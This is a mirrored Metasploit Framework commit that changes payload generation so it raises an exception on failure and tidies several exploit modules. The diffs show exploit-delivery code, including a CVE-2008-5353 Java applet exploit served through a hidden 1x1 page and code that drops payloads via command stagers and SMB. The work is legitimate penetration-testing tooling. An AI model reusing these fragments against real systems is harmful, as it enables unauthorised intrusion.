1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Land #6331, ensure generic payloads raise correct exceptions on failure

This commit is contained in:
Brent Cook 2015-12-23 15:43:12 -06:00
commit e4f9594646
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
16 changed files with 113 additions and 132 deletions

View File

@ -47,6 +47,15 @@ module Exploit::EXE
exe
end
# Returns an executable.
#
# @param opts [Hash]
# @option opts [String] :code Payload
# @option opts [Array] :arch Architecture
# @option opts [Msf::Module::PlatformList] :platform
# @raise [Msf::NoCompatiblePayloadError] When #genereate_payload_exe fails to generate a payload.
# @return [String]
def generate_payload_exe(opts = {})
return get_custom_exe unless datastore['EXE::Custom'].to_s.strip.empty?
return get_eicar_exe if datastore['EXE::EICAR']
@ -68,6 +77,11 @@ module Exploit::EXE
end
exe = Msf::Util::EXE.to_executable(framework, opts[:arch], opts[:platform], pl, opts)
unless exe
raise Msf::NoCompatiblePayloadError, "Failed to generate an executable payload due to an invalid platform or arch."
end
exe_post_generation(opts)
exe
end
@ -150,14 +164,42 @@ protected
:sub_method => datastore['EXE::OldMethod']
})
# Prefer the target's platform/architecture information, but use
# the module's if no target specific information exists
opts[:platform] ||= payload_instance.platform if self.respond_to? :payload_instance
opts[:platform] ||= target_platform if self.respond_to? :target_platform
opts[:platform] ||= platform if self.respond_to? :platform
opts[:arch] ||= payload_instance.arch if self.respond_to? :payload_instance
opts[:arch] ||= target_arch if self.respond_to? :target_arch
opts[:arch] ||= arch if self.respond_to? :arch
# This part is kind of tricky so we need to explain the logic behind the following load order.
# First off, platform can be seen from different sources:
#
# 1. From the opts argument. For example: When you are using generate_payload_exe, and you want
# to set a specific platform. This is the most explicit. So we check first.
#
# 2. From the metadata of a payload module. Normally, a payload module should include the platform
# information, with the exception of some generic payloads. For example: generic/shell_reverse_tcp.
# This is the most trusted source.
#
# 3. From the exploit module's target.
#
# 4. From the exploit module's metadata.
#
# Architecture shares the same load order.
unless opts[:platform]
if self.respond_to?(:payload_instance) && payload_instance.platform.platforms != [Msf::Module::Platform]
opts[:platform] = payload_instance.platform
elsif self.respond_to? :target_platform
opts[:platform] = target_platform
elsif self.respond_to? :platform
opts[:platform] = platform
end
end
unless opts[:arch]
if self.respond_to? :payload_instance
opts[:arch] = payload_instance.arch
elsif self.respond_to? :target_arch
$stderr.puts "target specific arch"
opts[:arch] = target_arch
elsif self.respond_to? :arch
opts[:arch] = arch
end
end
end
def exe_post_generation(opts)

View File

@ -95,10 +95,6 @@ class Metasploit4 < Msf::Exploit::Remote
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }

View File

@ -48,9 +48,6 @@ class Metasploit4 < Msf::Exploit::Local
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end

View File

@ -113,9 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@pl = generate_payload_exe
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
@payload_url = ""
if datastore['EXTURL'].blank?

View File

@ -111,14 +111,6 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig,
"#{peer} - Failed to store payload inside executable, " +
"please select a native payload")
end
execute_cmdstager(:linemax => 200, :nodelete => true)
end

View File

@ -123,10 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
@payload_url = ''
@dropped_elf = rand_text_alpha(rand(5) + 3)
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }

View File

@ -83,9 +83,6 @@ class Metasploit4 < Msf::Exploit::Local
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
pl = generate_payload_exe
if pl.blank?
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
end
exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"

View File

@ -138,13 +138,8 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error("Failed to generate the executable." )
return
end
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
end

View File

@ -13,12 +13,12 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::EXE
# Superceded by java_atomicreferencearray
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({ :javascript => false })
# include Msf::Exploit::Remote::BrowserAutopwn
# autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
def initialize(info = {})
super(
update_info(info,
'Name' => 'Sun Java Calendar Deserialization Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.
@ -39,74 +39,73 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
],
'Platform' => %w{ linux osx solaris win },
'Platform' => %w(linux osx solaris win),
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Arch' => ARCH_PPC
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86
}
],
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 03 2008'
))
)
)
end
def exploit
# load the static jar file
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5353.jar" )
fd = File.open( path, "rb" )
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2008-5353.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri( cli, request )
def on_request_uri(cli, request)
data = nil
host = nil
port = nil
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect( cli, get_resource() + '/', '')
if !request.uri.match(/\.jar$/i)
if !request.uri.match(/\/$/)
send_redirect(cli, get_resource + '/', '')
return
end
print_status("#{self.name} handling request")
print_status("#{name} handling request")
payload = regenerate_payload( cli )
if not payload
print_error( "Failed to generate the payload." )
payload = regenerate_payload(cli)
if !payload
print_error("Failed to generate the payload.")
return
end
@ -122,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Payload will be a Java bind shell")
end
if jar
print_status( "Generated jar to drop (#{jar.length} bytes)." )
jar = Rex::Text.to_hex( jar, prefix="" )
print_status("Generated jar to drop (#{jar.length} bytes).")
jar = Rex::Text.to_hex(jar, prefix = "")
else
print_error( "Failed to generate the executable." )
print_error("Failed to generate the executable.")
return
end
else
@ -133,27 +132,22 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status( "Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error( "Failed to generate the executable." )
return
end
print_status("Generated executable to drop (#{data.length} bytes).")
data = Rex::Text.to_hex(data, prefix = "")
end
send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
send_response_html(cli, generate_html(data, jar, host, port), 'Content-Type' => 'text/html')
return
end
print_status( "Sending Applet.jar" )
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
print_status("Sending Applet.jar")
send_response(cli, generate_jar, 'Content-Type' => "application/octet-stream")
handler( cli )
handler(cli)
end
def generate_html( data, jar, host, port )
def generate_html(data, jar, host, port)
html = "<html><head><title>Loading, Please Wait...</title></head>"
html += "<body><center><p>Loading, Please Wait...</p></center>"
html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">"
@ -162,11 +156,10 @@ class Metasploit3 < Msf::Exploit::Remote
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
html += "</applet></body></html>"
return html
html
end
def generate_jar()
return @jar_data
def generate_jar
@jar_data
end
end

View File

@ -137,13 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error("Failed to generate the executable." )
return
end
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
end

View File

@ -99,12 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(linemax: 500)
handler
end

View File

@ -99,12 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
# A last chance after the cmdstager

View File

@ -120,9 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Set up generic values.
payload_exe = rand_text_alphanumeric(4 + rand(4))
pl_exe = generate_payload_exe
if pl_exe.nil?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate an EXE payload, please select a correct payload")
end
append = false
#Now arch specific...
case target['Platform']

View File

@ -129,16 +129,6 @@ class Metasploit3 < Msf::Exploit::Remote
vprint_status("Sent command #{cmd}")
end
#
# generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
# manually sets one. This method is a temp work-around.
#
def check_generate_payload_exe
if generate_payload_exe.nil?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
end
end
def exploit
# Handle single command shot
@ -154,8 +144,6 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
check_generate_payload_exe
# Handle payload upload using CmdStager mixin
execute_cmdstager({:flavor => :printf})
end

View File

@ -204,10 +204,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
exe = ''
opts = { :servicename => servicename }
exe = generate_payload_exe_service(opts)
begin
exe = generate_payload_exe_service(opts)
fd << exe
fd.close
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#{filename}...")

View File

@ -140,18 +140,21 @@ class Metasploit3 < Msf::Exploit::Remote
fd = rclient.open("\\#{filename}", 'rwct')
exe = ''
opts = {
:servicename => servicename,
:code => code.encoded
}
if (datastore['PAYLOAD'].include? 'x64')
opts.merge!({ :arch => ARCH_X64 })
end
exe = generate_payload_exe_service(opts)
begin
exe = ''
opts = {
:servicename => servicename,
:code => code.encoded
}
if (datastore['PAYLOAD'].include? 'x64')
opts.merge!({ :arch => ARCH_X64 })
end
exe = generate_payload_exe_service(opts)
fd << exe
fd.close
fd << exe
ensure
fd.close if fd
end
print_status("Created \\#{filename}...")